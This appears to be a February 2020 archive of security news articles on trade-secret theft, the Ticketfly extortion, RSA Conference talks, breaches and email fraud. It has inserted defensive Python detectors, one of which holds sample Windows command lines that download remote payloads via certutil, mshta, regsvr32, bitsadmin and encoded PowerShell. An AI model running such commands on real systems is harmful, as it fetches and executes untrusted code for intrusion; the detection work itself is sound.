
Archive for February 2020

US Jails Chinese Scientist for Stealing $1bn of Trade Secrets

A Chinese scientist convicted of stealing trade secrets worth $1bn from an Oklahoma petroleum company has been jailed in the United States. 

Hongjin Tan had worked for the unnamed company since June 2017 in a group tasked with developing next-generation battery technologies for stationary energy storage. 

Vigilant coworkers caught the 36-year-old Chinese national and US legal permanent resident stealing hundreds of files containing proprietary information specifically related to flow batteries.

After being confronted with the theft, Tan admitted intentionally copying and downloading the research and development materials onto a thumb drive without authorization from his employer.

Realizing the jig was up, Tan turned in the thumb drive along with his resignation in December 2018. But when investigators examined the storage device, they found evidence that five documents that had been stored on it had since been deleted. 

The missing files were later located on an external hard drive recovered during a search of Tan's premises. Tan had copied the files and stored them at home, where they could be accessed, and potentially sold, at a later date. 

On November 12, 2019, Tan pleaded guilty to theft of a trade secret, unauthorized transmission of a trade secret, and unauthorized possession of a trade secret.

Speaking at the time, Assistant Attorney General for National Security John C. Demers said: “Tan’s guilty plea continues to fill in the picture of China’s theft of American intellectual property.

"The Department launched its China Initiative to battle precisely the type of behavior reflected in today’s plea—illegal behavior that costs Americans their jobs—and we will continue to do so.”  

Yesterday, US District Judge Gregory K. Frizzell sentenced Hongjin Tan to 24 months in federal prison and ordered him to pay $150,000 in restitution to his former employer. After completing his two-year prison sentence, Tan will spend a further three years on supervised release.

“The sentencing of Hongjin Tan underscores the FBI’s commitment to protecting our country's industries from adversaries who attempt to steal valuable proprietary information," said Melissa Godbold, special agent in charge of the FBI Oklahoma City Field Office.

"American companies invest heavily in advanced research and cutting-edge technology. Trade secret theft is detrimental to our national security and free-market economy. It takes profits away from companies and jobs away from hard working Americans."

Source: Information Security Magazine

FBI Indicts Alleged Ticketfly Hacker

The FBI has indicted a man suspected of being responsible for a hack that compromised the accounts of 127 million Ticketfly users.

Moulak O. Ishak allegedly hacked into Ticketfly's systems in 2018. Ticketfly punters who tried to purchase tickets for upcoming live gigs were greeted with a picture of the V for Vendetta character and the message "Ticketfly HacKeD By IsHaKdZ."

At the time of the attack, Ticketfly was owned by Eventbrite, which made the decision to temporarily take the platform offline in the wake of the breach. Eventbrite issued the online message, “Following a series of recent issues with Ticketfly properties, we’ve determined that Ticketfly has been the target of a cyber incident.”

Following the attack, Motherboard claimed that hacker IsHaKdZ told them via email that he had warned Ticketfly of a vulnerability that allowed him to take control of all the databases for Ticketfly and its website. 

In what sounds a lot like a ransom demand, the hacker is purported to have told Motherboard that he offered to share details of the vulnerabilities with Ticketfly in exchange for 1 bitcoin but never received a reply from the platform's operators. 

Following the hack, the personal details of six Ticketfly users were posted to a server as proof that IsHaKdZ's claims of being able to access the databases were real.

According to the indictment issued on February 18, the FBI believes that Ishak, using the pseudonym IsHaKdZ, attempted to extort money from Ticketfly over a five-day period. 

Ishak has been indicted on one count of forfeiture and one felony count of extortion in relation to damage to a protected computer.

The alleged cyber-criminal has not been apprehended, though a warrant has been issued for his arrest. If caught and convicted of these charges, Ishak could face a fine of $250,000 and up to three years behind bars. 

The indictment reads: "On or about 27 May 2018, and continuing to at least 31 May 2018, in the Northern District of California and elsewhere, the defendant, with intent to extort from Ticketfly money and other things of value, transmitted in interstate and foreign commerce a communication containing a demand and request for money and other things of value in relation to damage to a protected computer, to wit, Ticketfly’s servers, where such damage was caused to facilitate the extortion."

Source: Information Security Magazine

#RSAC: The Five Most Dangerous New Attacks of 2020 Aren't All That New

A key highlight of any RSA Conference in San Francisco is the annual "Top 5 Most Dangerous New Attack Techniques and How to Counter Them" session led by experts from the SANS Institute.

For the 2020 edition, however, many of the attack vectors presented weren't entirely new; rather, old threats had resurfaced. Also of note, while the session's title promises the top five new attacks, the researchers outlined more than five at this particular event.

Command and Control (C2) Returns

Ed Skoudis, instructor at the SANS Institute, highlighted what he called the "golden age of C2" as one of his top new threats. C2, short for command and control, refers to the infrastructure through which an attacker issues instructions to compromised machines; it is commonly associated with botnets controlled from a central point.

Skoudis identified several ways that organizations can help protect themselves from C2 activity. Among his suggestions is for defenders to vigorously control outbound traffic and look for beacons and log anomalies. He also suggested that security professionals enforce application white-listing to limit what can run within the enterprise.
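To show what "look for beacons" can mean in practice, here is an added example (not from the SANS session or the article) that scans outbound connection records for the regular, small, repeated requests a C2 implant produces when it checks in. The log format is a constructed, simplified proxy/firewall export, and the thresholds are assumptions to be tuned per environment:

```python
"""Spot C2-style beaconing in outbound connection logs.

Added example, not from the SANS session or the article.  Input is a
constructed, simplified proxy/firewall export with one connection per line:
"<epoch> <src_ip> <dst_host> <bytes_out>".  Real sources (Zeek conn.log,
Squid access.log, firewall exports) need only a different parse_log().
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample: one host browsing an ordinary site at irregular
# intervals and checking in with a suspicious host every ~60 s using
# near-identical request sizes (the beacon).  '.invalid' is a reserved TLD.
SAMPLE_LOG = """\
1700000000 10.0.0.5 cdn.example.com 1843
1700000004 10.0.0.5 cdn.example.com 912
1700000060 10.0.0.5 updates.badhost.invalid 215
1700000071 10.0.0.5 cdn.example.com 3310
1700000120 10.0.0.5 updates.badhost.invalid 214
1700000180 10.0.0.5 updates.badhost.invalid 216
1700000199 10.0.0.5 cdn.example.com 540
1700000241 10.0.0.5 updates.badhost.invalid 215
1700000300 10.0.0.5 updates.badhost.invalid 215
1700000360 10.0.0.5 updates.badhost.invalid 214
1700000377 10.0.0.5 cdn.example.com 7712
"""


def parse_log(text):
    """Yield (timestamp, src, dst, bytes_out) tuples from the simplified log."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, size = line.split()
        yield int(ts), src, dst, int(size)


def find_beacons(text, min_connections=5, max_jitter=0.2, max_size_cv=0.1):
    """Return (src, dst) pairs whose traffic looks like a C2 beacon.

    A pair is flagged when it has at least min_connections connections, the
    gaps between them are regular (coefficient of variation <= max_jitter),
    and the request sizes are near-constant (CV <= max_size_cv).  The
    thresholds are assumptions for this example; tune them per environment.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, size in parse_log(text):
        by_pair[(src, dst)].append((ts, size))

    hits = []
    for (src, dst), events in by_pair.items():
        if len(events) < min_connections:
            continue
        events.sort()
        gaps = [later - earlier for (earlier, _), (later, _) in zip(events, events[1:])]
        sizes = [size for _, size in events]
        if mean(gaps) == 0 or mean(sizes) == 0:
            continue  # burst of simultaneous or empty requests, not a beacon
        gap_cv = pstdev(gaps) / mean(gaps)
        size_cv = pstdev(sizes) / mean(sizes)
        if gap_cv <= max_jitter and size_cv <= max_size_cv:
            hits.append({"src": src, "dst": dst, "count": len(events),
                         "interval": round(mean(gaps)), "gap_cv": round(gap_cv, 3)})
    return hits


if __name__ == "__main__":
    for h in find_beacons(SAMPLE_LOG):
        print(f"beacon candidate: {h['src']} -> {h['dst']} every ~{h['interval']}s "
              f"({h['count']} connections, interval CV {h['gap_cv']})")
```

Real implants add jitter to their sleep, so the interval test is deliberately a tolerance rather than an equality; raising max_jitter trades false positives for coverage. The same per-pair grouping works on Zeek conn.log or firewall exports once the parsing step is swapped, and the candidates it produces are exactly the destinations to check against the outbound allow-list Skoudis recommends.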

Living Off the Land

Another trend that Skoudis identified is the concept of living off the land, which refers to attackers' making use of tools that are already present within an organization and then abusing them for malicious gain.

"If you're an attacker, what you could do is you could use the resources of the operating system itself to attack that machine, and to spread to other systems in the environment, so you're living off the land," he said.

The concept of living off the land is not entirely new either, having been reported on at least as far back as 2015.

There are several things that organizations can do to protect against living off the land attacks. One resource cited by Skoudis is the LOLBAS project, a community-maintained catalog of Windows binaries, scripts and libraries that attackers can abuse, which defenders can use to identify those tools, restrict their use and write detections for them.
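As an added example (not the LOLBAS project's own tooling, nor code from the session), the following scans process-creation records for a handful of well-known abuses of Windows built-ins: certutil fetching or decoding files, mshta and regsvr32 loading remote scriptlets, encoded PowerShell, bitsadmin transfers. The event lines are a constructed, simplified rendering of Sysmon process-creation data, the base64 payload is invented, and the pattern list is a small subset of what the LOLBAS catalog documents:

```python
"""Flag living-off-the-land (LOLBAS-style) command lines in process-creation events.

Added example, not from the SANS session or the LOLBAS project.  The rules
below are a small, hand-written subset of well-known abuse cases of Windows
built-ins; the LOLBAS catalog lists many more.  Input is a constructed stream
of simplified Sysmon Event ID 1 records rendered as key=value pairs.
"""
import re

# Constructed sample events, one process creation per line (raw string, so the
# Windows paths keep their single backslashes).  The base64 blob is invented.
SAMPLE_EVENTS = r"""
Image=C:\Windows\System32\certutil.exe CommandLine="certutil.exe -urlcache -split -f http://203.0.113.9/p.txt C:\Users\Public\p.txt" ParentImage=C:\Windows\System32\cmd.exe
Image=C:\Windows\System32\certutil.exe CommandLine="certutil.exe -verify C:\temp\signed.exe" ParentImage=C:\Windows\explorer.exe
Image=C:\Windows\System32\mshta.exe CommandLine="mshta.exe http://203.0.113.9/a.hta" ParentImage=C:\Windows\System32\wscript.exe
Image=C:\Windows\System32\regsvr32.exe CommandLine="regsvr32.exe /s /n /u /i:http://203.0.113.9/x.sct scrobj.dll" ParentImage=C:\Windows\System32\cmd.exe
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1" ParentImage=C:\Windows\System32\taskeng.exe
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA" ParentImage=C:\Windows\System32\cmd.exe
Image=C:\Windows\System32\bitsadmin.exe CommandLine="bitsadmin.exe /transfer job /download /priority high http://203.0.113.9/t.exe C:\Users\Public\t.exe" ParentImage=C:\Windows\System32\cmd.exe
"""

# (rule name, regex over the command line).  Each pattern anchors on the binary
# name and then looks for the switch or argument that marks the abuse case.
RULES = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in [
    ("certutil download",          r"certutil(\.exe)?\b.*-urlcache"),
    ("certutil decode",            r"certutil(\.exe)?\b.*-decode"),
    ("mshta remote script",        r"mshta(\.exe)?\b.*(https?://|vbscript:|javascript:)"),
    ("regsvr32 scriptlet",         r"regsvr32(\.exe)?\b.*(scrobj\.dll|/i:https?://)"),
    ("rundll32 inline script",     r"rundll32(\.exe)?\b.*(javascript:|vbscript:)"),
    ("powershell encoded/download", r"powershell(\.exe)?\b.*(-e(nc(odedcommand)?)?\s|downloadstring|downloadfile|\biex\b|invoke-expression)"),
    ("bitsadmin transfer",         r"bitsadmin(\.exe)?\b.*/transfer"),
    ("wmic remote process",        r"wmic(\.exe)?\b.*process\s+call\s+create"),
]]

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Turn 'Key=value Key="quoted value"' into a dict, stripping the quotes."""
    return {key: value.strip('"') for key, value in FIELD_RE.findall(line)}


def scan_events(text):
    """Return one hit per event whose command line matches a LOLBAS rule."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        cmd = event.get("CommandLine", "")
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append({"rule": name, "image": event.get("Image"),
                             "parent": event.get("ParentImage"), "command_line": cmd})
                break  # report the first matching rule only
    return hits


if __name__ == "__main__":
    for h in scan_events(SAMPLE_EVENTS):
        print(f"[{h['rule']}] parent={h['parent']}\n    {h['command_line']}")
```

The benign rows (certutil -verify, a scheduled PowerShell script) pass through untouched, which is the point: the binaries themselves are legitimate, so the detection has to key on the arguments and, in a fuller rule set, on the parent process, the user and whether the binary normally runs on that host at all.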

Deep Persistence

With the threat of deep persistence, Skoudis warned that malware can now be embedded deep into devices in a way that wasn't happening before. For example, he noted that it is now possible to embed malware in a USB charging cable.

With the charging cable example, even if an organization is able to purge whatever malware gets installed on a given system, with deep persistence, the next time the cable is plugged in, it will reinfect the system all over again.

Skoudis said that it's important for individuals and companies to not just plug anything into their system and to make sure that cables and other peripherals are acquired from trusted sources.

Mobile Device Integrity

Heather Mahalik, senior instructor and director of digital intelligence at SANS Institute highlighted the risk of mobile devices as one of her top threats.

Given that mobile phones have become an essential part of daily life, she noted that if a phone falls into the wrong hands it could be catastrophic. She wasn't just talking about lost or stolen devices, but also about the risk of refurbished devices that have not been properly wiped of the previous owner's data.

She also mentioned the risk posed by the checkm8 vulnerability in Apple iOS devices, a flaw in the boot ROM of the affected chips that cannot be fixed by a software update and that enables the checkra1n jailbreak.

How 2FA Can Hurt You

Two-factor authentication (2FA) is a recommended best practice for improving user security, but it is not a panacea. Mahalik noted that simply requiring a code to be typed in is not enough on its own.

She also warned that there are some apps that only require a phone number, which is a risk if a user gives up their phone number and the carrier then reissues that number to a new customer.

"You want a password and 2FA," she said. "If it's just one or the other, it's not a good scenario."

Mahalik suggested that when users get a new phone number they should make sure they go into every application that has 2FA and change to the new number.

Enterprise Perimeter Vulnerabilities

Johannes Ullrich, dean of research at SANS Institute, identified the risk of enterprise perimeter vulnerabilities as one of his top threats.

Over the past year there have been numerous publicly reported issues in widely deployed enterprise firewall and perimeter security devices.

Aside from patching, Ullrich suggests that users never expose an administrative interface on an enterprise perimeter device to the public internet.

Localhost APIs

The final emerging threat identified by Ullrich is localhost APIs: listeners embedded in enterprise applications that call out to third-party resources. While these APIs are intended to enable functionality such as technical-support agents, they also expose enterprises to risk, because any process on the host can reach a listener bound to localhost, so the API is only as safe as the authentication it enforces itself.

To help limit the risk, Ullrich suggests that users, where possible, identify what is listening on which ports on a system and monitor how applications call out to external resources.
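One way to carry out the first of those checks, as an added example that is not from the session: parse the output of iproute2's `ss -ltnp` and separate services bound only to loopback from those reachable from the network. The capture below is constructed in that command's column layout, with invented process names and ports; on a real host the process column is empty unless `ss` runs with sufficient privileges.

```python
"""Inventory TCP listeners from `ss -ltnp` output and separate loopback-only
services from those reachable from the network.

Added example, not from the SANS session.  SAMPLE_SS is a constructed capture
in the column layout iproute2's `ss -ltnp` prints (State, Recv-Q, Send-Q,
Local Address:Port, Peer Address:Port, Process); names and ports are invented.
On a live host, feed the real output instead:
    classify_listeners(subprocess.run(["ss", "-ltnp"], capture_output=True, text=True).stdout)
"""
import re

SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      4096   0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      128    127.0.0.1:8765      0.0.0.0:*         users:(("supportagent",pid=1422,fd=7))
LISTEN 0      511    0.0.0.0:9000        0.0.0.0:*         users:(("helperd",pid=1510,fd=5))
LISTEN 0      4096   [::1]:631           [::]:*            users:(("cupsd",pid=640,fd=8))
LISTEN 0      4096   *:5000              *:*               users:(("nodeapp",pid=2201,fd=19))
LISTEN 0      128    127.0.0.1:6010      0.0.0.0:*
"""

LOOPBACK = {"127.0.0.1", "[::1]", "localhost"}
WILDCARD = {"0.0.0.0", "*", "[::]"}
PROCESS_RE = re.compile(r'\("([^"]+)",pid=(\d+)')


def parse_ss(text):
    """Yield (address, port, process_name) for each LISTEN row.

    process_name is None when ss printed no process column (unprivileged run).
    """
    for line in text.splitlines()[1:]:          # first row is the header
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        addr, port = fields[3].rsplit(":", 1)   # rsplit keeps IPv6 '[::1]' intact
        m = PROCESS_RE.search(line)
        yield addr, int(port), (m.group(1) if m else None)


def classify_listeners(text):
    """Bucket listeners by how widely they are reachable.

    loopback:       only processes on this host can connect
    all_interfaces: reachable from every network the host is on
    specific:       bound to one particular address
    """
    report = {"loopback": [], "all_interfaces": [], "specific": []}
    for addr, port, proc in parse_ss(text):
        if addr in LOOPBACK:
            bucket = "loopback"
        elif addr in WILDCARD:
            bucket = "all_interfaces"
        else:
            bucket = "specific"
        report[bucket].append((port, proc))
    return report


if __name__ == "__main__":
    for bucket, entries in classify_listeners(SAMPLE_SS).items():
        print(bucket)
        for port, proc in entries:
            print(f"  {port:>5}  {proc or '<unknown, rerun as root>'}")
```

A listener bound to 127.0.0.1 is unreachable from the network but reachable by every process on the host, so the loopback list is the one to review for agents and APIs that rely on the binding alone for authentication; the all_interfaces list is what an external port scan would see. Entries with no process name are worth a privileged rerun rather than a shrug.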

Source: Information Security Magazine

Michigan Healthcare Group Hack Went Undetected for Six Months

A data breach that exposed patients' personal health information (PHI) for almost three months went undetected for half a year at a Michigan healthcare group.

Hackers gained access to patient data held by Munson Healthcare Group by compromising the email accounts of at least two employees. Patient records were accessed from July 31, 2019, to October 22, 2019, but the breach went undetected until January 16, 2020.

What data was compromised in the prolonged attack varied from patient to patient, but information accessed by the hackers included financial account numbers, driver’s license numbers, dates of birth, and Social Security numbers. 

Health information, including insurance details, treatments, and diagnostic data were also exposed by the breach. 

Exactly how many patients were affected by the breach has not been revealed by Munson Healthcare, but given the size of the group, the number could potentially be high. From its base in Traverse City, Munson Healthcare operates nine hospitals in 30 counties spread through Northern Michigan.

The group has 7,500 employees and covers an area of 11,177 square miles, which is roughly the size of Vermont and Delaware combined.

“This incident does not affect all patients of Munson Healthcare and not all information was included for all individuals. Munson Healthcare is now notifying affected individuals so that they can take steps to protect their information,” a spokesperson for Munson Healthcare said.

The group went on to say that no evidence had been found to indicate that the information exposed in the breach had been acquired or misused by any third parties who accessed it. Given how long it took the group to detect that the breach had even occurred, this statement may come as cold comfort to Munson patients whose data was accessed by hackers.

"Patient privacy is a top priority and we take this matter very seriously,” said Lucas Otten, Munson Healthcare's director of information security.

“Munson regularly trains and educates all employees on cybersecurity awareness and risks, and we use a 24×7 staffed cybersecurity response team in partnership with other Michigan hospitals to detect and respond to suspicious incidents as they happen."

Source: Information Security Magazine

#RSAC: GM CEO Stresses Need to Invest in Developing Next Generation of Cyber Engineers

Delivering a keynote talk at the RSA Conference in San Francisco, Mary T Barra, chairman and CEO of General Motors Company, said “all of you today are the best and strongest line of defense in this ongoing and even more complex fight.”

Barra had concluded the first part of her keynote talk by saying that “we know this is a marathon with no finish line” and stressed the need for more talent, citing the most recent (ISC)2 Cyber Workforce Survey, which estimated a shortage of four million skilled people by 2022. She said that “without the right people and the right tools” security risks will increase, “and endanger all of us.”

She added that for long term success of every business that exists in a digital ecosystem “we must fill the talent gap, and not just with anyone but with everyone.”

She highlighted the need to recruit more “women and minorities, who are under-represented in the engineering and IT fields.” To that end, GM has run outreach programs in schools that promote “rewarding careers” in science, technology, engineering and mathematics (STEM) and “help them see a path for themselves in this space.” Last year these programs reached 300,000 students and teachers across the United States; General Motors has also participated in nationwide careers programs and encouraged its own engineers to do outreach in schools.

“If we want to cultivate young people of the future, we need to invest in theirs,” she said.

Source: Information Security Magazine

Let’s Encrypt Hits One Billion Certificate Milestone

The free certificate authority Let’s Encrypt yesterday announced it has issued its billionth certificate, in what it claims to be a milestone for user privacy and security.

Backed by the non-profit Internet Security Research Group (ISRG), the initiative has good reason to make such claims, having made what was once a complex and expensive process — registering and managing TLS certificates — free and easy.

In a blog post from executive director, Josh Aas, and VP of comms, Sarah Gran, the two revealed how HTTPS page loads have risen from 58% of the global total in 2017 to 81%, and even higher (91%) in the US.

“When you combine ease of use with incentives, that’s when adoption really takes off. Since 2017 browsers have started requiring HTTPS for more features, and they’ve greatly improved the ways in which they communicate to their users about the risks of not using HTTPS,” they explained.

“When websites put their users at risk by not using HTTPS, major browsers now show stronger warnings. Many sites have responded by deploying HTTPS.”

However, there’s another side to the free encryption message: as well as making it easier for legitimate users to improve security, it has made it simpler for cyber-criminals to hide their activities online.

In 2016, for example, Trend Micro reported that malvertisers were using Let’s Encrypt to hide malicious advertising from network security tools.

A couple of years later, a flaw in one of the domain-validation methods of the ACME protocol used by Let’s Encrypt was found which could have allowed attackers to obtain certificates for domains they did not own.  

However, the organization has also been improving its own security and authentication processes. Last week it launched multi-perspective domain validation, which repeats each validation check from several network vantage points, so that an attacker who can redirect traffic on one path (for example by hijacking a route) cannot pass validation for a domain they do not control.

Source: Information Security Magazine

Shark Tank Star Corcoran Loses $400K in Email Scam

A US TV star has lost nearly $400,000 in a classic email fraud scam after a fraudster persuaded her bookkeeper to wire funds to a new bank account.

Multi-millionaire Barbara Corcoran describes herself as an “NYC real estate queen” and is one of the investors on popular show Shark Tank. However, on Wednesday, she took to Twitter with the brief message, “Lesson learned: Be careful when you wire money!”

In fact, it was her bookkeeper who had been tricked into wiring the $388,000 to an account at an Asian bank, according to reports.

A fraudster reportedly spoofed the email address of Corcoran’s assistant, telling the bookkeeper to wire the funds to a German company called FFH Concept.

It’s unclear whether this was a legitimate supplier or a new organization, but the scammer apparently responded to an initial query for more information with a detailed explanation about the invoice.

That indicates they put in plenty of work ahead of time researching Corcoran’s business.

This modus operandi is similar to the business email compromise (BEC) or CEO fraud scams that netted scammers a staggering $1.8bn last year, accounting for half of all reported cybercrime losses. That’s up from around $1.3bn in 2018, according to the FBI.

Peter Goldstein, CTO and co-founder of Valimail, argued that firms cannot rely on human intuition alone to stop such scams.

“The phishing scam impacting Corcoran’s company clearly debunks the myth that phishing emails are easy to spot. Many companies invest in employee security training to prevent this kind of attack, but as this incident proves, humans are not able to identify malicious emails reliably,” he added.

“Hackers leverage impersonation and heavily researched social engineering tactics to appear as trustworthy senders, and their fraudulent messages are often indistinguishable from legitimate ones.”

Goldstein recommended investing in technologies which validate and authenticate sender identity. It’s reported that the email address used by the hacker was almost identical to that of Corcoran’s assistant but missing a single 'o' — a common tactic to trick recipients.
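A practical check for the lookalike-address trick described above, as an added example that is neither from the article nor from Valimail's product: compare the sender's domain with the domains of known contacts using edit distance, so that a missing letter, a swapped pair or an "rn" standing in for "m" is flagged before anyone acts on a payment instruction. Contacts, domains and sample senders are constructed.

```python
"""Flag sender addresses whose domain is a near-miss of a trusted domain.

Added example, not from the article or from Valimail.  A lookalike check of
this kind complements, rather than replaces, sender authentication (SPF, DKIM,
DMARC): those prove a message really came from the domain in the From header,
while this check asks whether that domain is a letter or two away from a domain
you trust.  Contacts, domains and sample senders below are constructed.
"""


def osa_distance(a, b):
    """Optimal string alignment distance: insertions, deletions, substitutions
    and adjacent transpositions each cost 1."""
    rows, cols = len(a) + 1, len(b) + 1
    d = [[0] * cols for _ in range(rows)]
    for i in range(rows):
        d[i][0] = i
    for j in range(cols):
        d[0][j] = j
    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # delete a[i-1]
                          d[i][j - 1] + 1,          # insert b[j-1]
                          d[i - 1][j - 1] + cost)   # substitute
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transpose
    return d[-1][-1]


def split_address(addr):
    """Return (local_part, domain), lower-cased, from an email address."""
    local, _, domain = addr.strip().lower().rpartition("@")
    return local, domain


def classify_sender(addr, known_addresses, max_distance=2):
    """Return 'known', 'same-domain', 'lookalike' or 'unknown' for a sender.

    'lookalike' means the sender's domain is within max_distance edits of a
    trusted domain without being equal to it: the case to hold for out-of-band
    verification (a phone call to the real contact) before money moves.
    """
    known = {a.strip().lower() for a in known_addresses}
    if addr.strip().lower() in known:
        return "known"
    _, domain = split_address(addr)
    known_domains = {split_address(a)[1] for a in known}
    if domain in known_domains:
        return "same-domain"          # a different person at a trusted domain
    if not known_domains:
        return "unknown"
    nearest = min(known_domains, key=lambda d: osa_distance(domain, d))
    if osa_distance(domain, nearest) <= max_distance:
        return "lookalike"
    return "unknown"


# Constructed allow-list and senders.
KNOWN_CONTACTS = ["assistant@corcoran-office.example",
                  "bookkeeper@corcoran-office.example"]

SAMPLE_SENDERS = [
    "assistant@corcoran-office.example",   # exact match
    "legal@corcoran-office.example",       # different person, trusted domain
    "assistant@corcran-office.example",    # one 'o' missing, as in the Corcoran case
    "assistant@corcoran-offcie.example",   # adjacent letters swapped
    "assistant@corcoran-office.exarnple",  # 'rn' standing in for 'm'
    "sales@ffhconcept.example",            # unrelated domain
]

if __name__ == "__main__":
    for sender in SAMPLE_SENDERS:
        print(f"{classify_sender(sender, KNOWN_CONTACTS):12} {sender}")
```

Keep max_distance small: on short domains, two edits can separate two legitimately different names, and the check is a tripwire for manual verification, not a verdict. It also does nothing about a display name that says "Assistant" over a free-mail address, or about a genuinely compromised mailbox at the trusted domain, which is why Goldstein's point about authenticating the sender stands alongside it rather than being replaced by it.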

Source: Information Security Magazine

Facebook Sues Analytics Firm Over “Malicious” SDK

Facebook has filed a lawsuit in California against a data analytics company it claims has illegally accessed user data.

New Jersey-based OneAudience allegedly paid app developers to install a malicious software development kit (SDK) in their apps. This was designed to harvest information including the name, gender, email and username of users logging in to the apps with their Facebook credentials, the social network claimed.

“Security researchers first flagged OneAudience’s behavior to us as part of our data abuse bounty program. Facebook, and other affected companies, then took enforcement measures against OneAudience,” wrote the firm’s director of platform enforcement and litigation, Jessica Romera.

“Facebook’s measures included disabling apps, sending the company a cease and desist letter, and requesting their participation in an audit, as required by our policies. OneAudience declined to cooperate.”

The firm is said to have done the same to Twitter and Google users. Twitter claimed in a notice that the issue was down to “a lack of isolation between SDKs within an application.

“Our security team has determined that the malicious SDK, which could be embedded within a mobile application, could potentially exploit a vulnerability in the mobile ecosystem to allow personal information (email, username, last Tweet) to be accessed and taken using the malicious SDK,” it explained.

“While we have no evidence to suggest that this was used to take control of a Twitter account, it is possible that a person could do so.”

In a statement back in November, OneAudience said that it was shutting down the offending SDK.

“Recently, we were advised that personal information from hundreds of mobile IDs may have been passed to our OneAudience platform. This data was never intended to be collected, never added to our database and never used,” it said.

“We proactively updated our SDK to make sure that this information could not be collected on November 13 2019. We then pushed the new version of the SDK to our developer partners and required that they update to this new version.”

Source: Information Security Magazine

#RSAC: Election Security Beyond the Ballot Box

There has been a lot written in recent years about election security and ensuring the integrity of voting systems. While voting machines are important, so too are non-voting election technologies, which was the topic of a session at the RSA Conference in San Francisco.

Aaron Wilson, Senior Director of Election Security at the Center for Internet Security (CIS), explained that non-voting election systems include things that support elections. Those systems include electronic poll books, election night reporting systems, voter registration systems, and electronic ballot delivery.

"There is a lot to that attack surface, but there are not a lot of standards and regulations," Wilson said.

The Center for Internet Security has developed a guide to help secure those non-voting election systems that has 160 best practices to help reduce risk and improve confidence. The overall goal, according to Wilson, isn't necessarily that every election official will do all the steps, but rather they will have a guide that provides questions to ask vendors and IT staff.

Core Recommendations

There are three key areas that Wilson suggested election officials should look at. The first is dealing with Denial of Service (DoS) risks.

"Denial of Service is concerning because you know exactly when to wage the attack against an election system," he said. "If you can take a service down in a moment of critical need it can have significant impact."

Ransomware is also a risk that election officials need to defend against. Wilson said that both DoS and ransomware attacks are essentially about availability and denying access to assets.

The third key area is something Wilson referred to as unauthorized data modification. That's a critical area for non-voting election system integrity, as an unauthorized change can throw an election into doubt.

Among the key recommendations that Wilson provided to reduce the risk of unauthorized data modification are the following:

  • Deployment of automated software patch management tools
  • Using best practices for securely handling input and output
  • Verifying data on backup media
  • Deployment of application layer filtering
  • Enforcement of access controls to data

Verifying Election Technology

Going a step beyond best practices, there is also an ongoing need to verify that systems are in fact operating as intended on a continuous basis. That's where the RABET-V: Rapid Architecture-Based Election Technology Verification framework comes into play.

"RABET-V is an election technology verification process that supports rapid product changes by design," Wilson said.

The RABET-V effort was launched in February 2020 as a pilot program and is available as an open source effort on GitHub.

"It provides a consistent basis from which approval authorities can draw information, resulting in quicker decisions and reduced, amortized overall cost," Wilson concluded.

Source: Information Security Magazine

#RSAC: How to Hack Society

The methods, procedures, and practices used by cybersecurity professionals have relevance beyond the technology sphere; they can also be used to hack society.

That's the view espoused by Bruce Schneier, security technologist, researcher, and lecturer at the Harvard Kennedy School, during a keynote session at the RSA Conference in San Francisco.

"This is the big idea: we here in our community have developed some very effective techniques to deal with code and technology," Schneier said. "Can our expertise in IT security transfer to broader social systems like the tax code, or the systems we use to choose our elected officials or the market economy?"

Schneier argued that the hacker mindset, that is, an approach to thinking about how things fail and how to make things fail, has broader implications than just computer security. He suggested that the cybersecurity procedural mindset is valuable in a broader context and can be used to help secure the systems that make up society.

"As the world looks more like a computer, our security skills become more applicable," he said.

That said, Schneier noted that he didn't want to imply that technology can fix everything, but rather there is perhaps a way to blend technology and policy in a new way that can improve human communities.

The Hacking Mindset

Using a hacking mindset to impact society isn't an entirely new idea. Schneier remarked that NSA whistleblower Edward Snowden wrote in his memoir that the US intelligence community hacked the Constitution in order to justify mass surveillance.

"We can argue whether that's true or not, but everyone here intuitively knows what he means by that," Schneier said.

Another example of how the hacking mindset is already in use is within the advertising industry. Schneier argued that advertising is a hack of humans' cognitive systems to help influence choices.

Political forces are already using hacking-style techniques for propaganda as well.

"Authoritarian regimes are vulnerable to information attacks that challenge their monopoly on common political knowledge, and that is why an open internet is so dangerous to an autocracy," Schneier said. "Democracies are vulnerable to information attacks that turn common political knowledge into contested political knowledge."

Schneier suggested that there are several ways modern cybersecurity practices can be used to hack society for good purposes.

In cybersecurity, having transparency and visibility is a foundational idea that is a useful concept for society in general.

"We have other solutions in our tech tool kit like defense in-depth, compartmentalization, isolation, sandboxing, audit, incident response, and patching," he said. "We never actually solve a security problem, we iterate, so is there some way to iterate law to have extensible law, where we implement some rapid feedback in our laws and regulations."

A key challenge that Schneier sees today is that we don't have policy institutions with footprints to match the technology that society uses. For example, he noted that Facebook is global, yet it's only regulated nationally by specific governments.

"Our problems tend to be social problems masquerading as tech problems and tech solutions masquerading as social solutions," Schneier said. "We need to better integrate tech and policy."

Source: Information Security Magazine